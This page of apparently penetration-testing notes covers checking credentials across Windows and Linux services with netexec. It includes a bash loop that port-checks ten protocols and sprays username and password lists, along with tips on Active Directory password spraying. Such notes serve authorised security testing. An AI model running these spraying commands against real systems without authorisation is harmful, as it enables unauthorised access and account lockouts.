search

Checking Credential

hashtag
General way of Checking protocol

# Below is general command:
netexec <Protocol> $IP  -u $username[File/Name] -p $passwords[File/Name] --continue-on-success --port <ProvideCustomPort>

hashtag
Automated way:

circle-info

Please be cautious about the system's lockdown policy.

# First Set IP
IP=<IP_AddressToScan>

# If you have port different then change the port number in below command:

for proto_port in "wmi:135" "rdp:3389" "winrm:5985" "ldap:389" "ssh:22" "mssql:1433" "nfs:2049" "smb:445" "ftp:21" "vnc:5900"; do \
    protocol=${proto_port%%:*}; port=${proto_port##*:}; \
    echo "Checking $protocol on port $port..."; \
    nc -z -w3 $IP "$port" && \
    echo "$protocol port $port is open. Running netexec..." && \
    netexec "$protocol" $IP -u usernames.txt -p passwords.txt --continue-on-success --port "$port"; \
done
circle-exclamation

For password spraying in Active Directory (AD), if standard password spraying does not seem to work, try using the Fully Qualified Domain Name (FQDN). Example: era.secura.yzx (in the format: name.domain values).

Use -d flag in netexec for specifying the domain.

circle-exclamation

If you want to use specific usernames and passwords, replace usernames.txt and passwords.txt in the script with your actual username and password respectively.

triangle-exclamation

If you have access to SMB or FTP or any other then check it. Even if you don't get pwned! Msg.

Make changes like this.

hashtag
Checking Private Key if valid for any users

If asking for password then try to crack it using below method.

LogoSSH Private key cracking | Tools | Tips To Securehacking.tipstosecure.comchevron-right
PreviousDumping HASHNextAdding RDP Access

Last updated